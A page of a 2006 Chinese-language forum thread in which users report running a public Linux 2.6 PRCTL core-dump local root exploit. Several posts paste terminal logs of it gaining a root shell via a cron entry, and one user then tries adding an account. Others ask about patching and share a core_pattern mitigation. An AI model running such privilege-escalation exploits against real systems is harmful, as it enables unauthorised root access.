1 2 34 / 4 页

论坛徽章:: 0

31楼 [报告]

发表于 2006-08-30 16:27 |只看该作者

ubuntu 5.10 kernel 2.6.12－10

没有通过，貌似打上补丁了

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

iamshiyu

小富即安

论坛徽章:: 0

32楼 [报告]

发表于 2006-08-30 17:50 |只看该作者

原帖由 suran007 于 2006-8-30 12:53 发表

请问，将/etc/cron.d目录下的两个core文件删除，会不会有什么问题？

我看了一下文件的生成时间，大概就是我试验漏洞的那次，删除了到现在还没什么问题。
但是怎么给内核打上补丁弥补呢？……
另外我用的系统每次用rkhunter扫描都告诉我openssl的版本过低，php的版本过低：
- Bind DNS 9.2.4                                        [ Unknown ]
- OpenSSL 0.9.7a                                        [ Old or patched version ]
- PHP 4.3.9                                              [ Old or patched version ]
Checking for allowed protocols...                         [ Warning (SSH v1 allowed) ]
可是我实在菜，不知道怎么补上这些漏洞啊……
哪位能给讲讲？能补上任何一个也行啊！

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

iamshiyu

小富即安

论坛徽章:: 0

33楼 [报告]

发表于 2006-08-31 10:54 |只看该作者

看到有人讨论的一个简便的解决方法……
echo /root/core > /proc/sys/kernel/core_pattern
给出的解释是：This specifies /root as core dump location which makes it unavailable for the local user.
是说让core dump location不能随便写入么？加了/root以后普通用户就无权再生成某个文件了？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

deargentle

小富即安

论坛徽章:: 0

34楼 [报告]

发表于 2006-09-01 09:56 |只看该作者

原帖由 飘雪心辰 于 2006-8-20 09:30 发表
=====================================
从红帽kernel-2.6.9-34.0.2.EL.i686.rpm开始的内核已经修复了此漏洞。此exploit无法使用。

kernel-2.6.9 不成功?，好不容易过把黑客的瘾，还不成。。呵呵
[gentle@snort ~]$ ll
total 12
-rwxrwxr-x 1 gentle gentle 6171 Sep 1 12:09 rs_prctl_kernel
-rw-rw-r-- 1 gentle gentle 1123 Sep 1 12:09 rs_prctl_kernel.c
[gentle@snort ~]$ whoami
gentle
[gentle@snort ~]$ id
uid=500(gentle) gid=501(gentle) groups=501(gentle)
[gentle@snort ~]$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

Creating Cron entry

Sleeping for aprox. one minute (** please wait **)

Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
[gentle@snort ~]$ whoami
gentle
[gentle@snort ~]$ id
uid=500(gentle) gid=501(gentle) groups=501(gentle)
[gentle@snort ~]$ uname -a
Linux snort 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 i686 i386 GNU/Linux
[gentle@snort ~]$

附：同一台机器，又执行了两次，结果成功了，看来还有概率问题。

[gentle@snort ~]$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

Creating Cron entry

Sleeping for aprox. one minute (** please wait **)

Running shell (remember to remove /tmp/sh when finished) ...

sh-3.00# ls
core.3200 h00lyshit k-rad3 root.c          rs_prctl_kernel.c
do_mremap.c  h00lyshit.c  k-rad3.c  rs_prctl_kernel

sh-3.00# who
root    pts/0       Sep  1 12:47 (10.0.101.234)

sh-3.00# id
uid=500(gentle) gid=501(gentle) euid=0(root) groups=501(gentle)

sh-3.00# uanme -a
sh: uanme: command not found

sh-3.00# adduser haha
sh-3.00# passwd haha
passwd: Only root can specify a user name.
sh-3.00#

[ 本帖最后由 deargentle 于 2006-9-1 10:57 编辑 ]

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

耶寇

白手起家

论坛徽章:: 0

35楼 [报告]

发表于 2006-09-10 15:24 |只看该作者

[root@localhost home]# uname -a
Linux localhost.localdomain 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux

测试成功~~~~~~~~

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

langue

版主

论坛徽章:: 0

36楼 [报告]

发表于 2006-09-10 16:51 |只看该作者

原帖由 frosty 于 2006-7-14 15:41 发表
好东东要是1年前发布就更好了。有空试试。

我晕。借助了cron和core dump。不过我觉得并没有什么。

现在搞不懂的是，为什么那些黑客都有用自己看都发毛的文字。比如那个RomanSoft，偏偏要RoMaNSoFt，看着不累啊！root就行了，偏偏把o换0（零），恶心。

看来我要花些时间消化。

[ 本帖最后由 langue 于 2006-9-10 16:54 编辑 ]

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

damoclesIII

白手起家

论坛徽章:: 0

37楼 [报告]

发表于 2006-09-12 22:26 |只看该作者

Linux 2.6.11-2.QLsmp #1 的内核，都可以用，天，但是要cp个sh到tmp中

[admin@ab gcc]$ ./a.out
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh-3.00#

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

damoclesIII

白手起家

论坛徽章:: 0

38楼 [报告]

发表于 2006-09-12 22:29 |只看该作者

但是debian 内核的 Linux 2.6.8-2-686 好像不行

admin@3[gcc]$ ./a.out
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

1 2 34 / 4 页

返回列表

Chinaunix › 论坛 › IT运维 › 数据安全 › Linux Kernel2.6x 最新本地溢出代码[zz]

Linux Kernel2.6x 最新本地溢出代码[zz] [复制链接]